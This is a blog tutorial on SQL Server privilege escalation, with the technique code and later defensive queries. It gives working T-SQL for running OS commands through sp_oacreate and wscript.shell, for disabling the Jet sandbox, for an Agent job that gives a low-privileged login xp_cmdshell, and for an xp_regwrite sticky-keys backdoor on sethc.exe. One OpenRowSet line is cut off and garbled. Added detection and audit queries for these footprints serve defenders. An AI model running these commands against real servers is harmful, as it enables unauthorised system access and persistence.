SQL Server from 0 to 1: Privilege Escalation

Published: 2024-01-08

Privilege escalation via xp_cmdshell

xp_cmdshell was already covered in the earlier section on writing a webshell, so it is not repeated here.

Privilege escalation via sp_oacreate

Enable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
Disable:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;
Execute:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'


Sandbox privilege escalation

1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

Meaning of the SandBoxMode value (the default is 2):
`0`: sandbox mode disabled for everyone (unsafe expressions are allowed)
`1`: sandbox mode enabled only for non-Access applications
`2`: sandbox mode enabled only for Access (the default)
`3`: sandbox mode always on

Execute a command:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\i


public

USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
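The security point of the job above is that an Agent job step runs under the SQL Server Agent service account, not under the login that created it, so anyone who can create jobs in msdb can borrow that account's privileges. The T-SQL below is an added detection query, not part of the original post: it lists job steps that call command-execution procedures (and who owns them), then lists the msdb role members who are allowed to create jobs. It assumes the caller is a sysadmin or a member of SQLAgentReaderRole in msdb.

```sql
-- Added detection query (not from the original post). Finds Agent job steps whose
-- command reaches out to the OS, with the owner and creation time for triage.
SELECT  j.name                   AS job_name,
        SUSER_SNAME(j.owner_sid) AS job_owner,
        j.date_created,
        j.enabled,
        s.step_id,
        s.step_name,
        s.subsystem,
        s.command
FROM    msdb.dbo.sysjobs     AS j
JOIN    msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE   s.command LIKE '%xp_cmdshell%'
   OR   s.command LIKE '%xp_execresultset%'
   OR   s.command LIKE '%sp_oacreate%'
   OR   s.subsystem IN ('CmdExec', 'PowerShell')   -- non-TSQL steps run OS commands directly
ORDER BY j.date_created DESC;

-- Who is allowed to create jobs at all? Members of these msdb roles can schedule
-- steps that execute as the Agent service account, so the list should be short.
SELECT  r.name AS msdb_role,
        m.name AS member
FROM    msdb.sys.database_role_members AS rm
JOIN    msdb.sys.database_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    msdb.sys.database_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name IN ('SQLAgentUserRole', 'SQLAgentReaderRole', 'SQLAgentOperatorRole')
ORDER BY r.name, m.name;
```

A job created with @delete_level = 1 removes itself after a successful run, so the first query may come back empty even after the technique was used; the msdb.dbo.sysjobhistory table and the Agent log keep a record of completed steps and are the place to look in that case.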

xp_regwrite

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
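Both the Jet sandbox technique and the xp_regwrite technique leave a footprint in the Windows registry, and the same extended procedures can be used to audit it. The T-SQL below is an added audit script, not code from the original post. It reads the SandBoxMode value and flags a 0, then enumerates the Image File Execution Options subkeys and reports every executable that has a Debugger redirect set. It assumes a sysadmin context (xp_regread and xp_regenumkeys are restricted otherwise) and a 32-bit view of the Jet key; on some 64-bit hosts the Jet value lives under Wow6432Node instead.

```sql
-- Added audit script (not from the original post). Requires sysadmin for the
-- registry extended procedures.

-- 1. Jet sandbox mode: shipped default is 2. A value of 0 means unsafe
--    expressions (including shell calls) are allowed and should be investigated.
DECLARE @sandbox int;
EXEC master.dbo.xp_regread
        @rootkey    = 'HKEY_LOCAL_MACHINE',
        @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
        @value_name = 'SandBoxMode',
        @value      = @sandbox OUTPUT;
SELECT  @sandbox AS sandbox_mode,
        CASE WHEN @sandbox = 0 THEN 'sandbox disabled - review' ELSE 'ok' END AS status;

-- 2. Image File Execution Options: a Debugger value under a subkey redirects that
--    executable to another program. Outside genuine debugging setups this is a
--    persistence indicator, so every hit is listed for review.
DECLARE @ifeo nvarchar(512) =
    N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options';
DECLARE @subkeys TABLE (subkey nvarchar(260));
INSERT INTO @subkeys (subkey)
EXEC master.dbo.xp_regenumkeys 'HKEY_LOCAL_MACHINE', @ifeo;

DECLARE @findings TABLE (image nvarchar(260), debugger nvarchar(1024));
DECLARE @name nvarchar(260), @dbg nvarchar(1024), @path nvarchar(1024);

DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT subkey FROM @subkeys;
OPEN c;
FETCH NEXT FROM c INTO @name;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @dbg  = NULL;                       -- stays NULL when no Debugger value exists
    SET @path = @ifeo + N'\' + @name;
    EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', @path, 'Debugger', @dbg OUTPUT;
    IF @dbg IS NOT NULL
        INSERT INTO @findings (image, debugger) VALUES (@name, @dbg);
    FETCH NEXT FROM c INTO @name;
END
CLOSE c;
DEALLOCATE c;

SELECT image, debugger FROM @findings ORDER BY image;
```

Any row in the final result set that points an accessibility binary (sethc.exe, utilman.exe and the like) at a shell or explorer is a clear sign of tampering; removing the Debugger value and reviewing who had xp_regwrite rights on the instance are the remediation steps.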
Source: https://blog.csdn.net/2301_80520893/article/details/135339463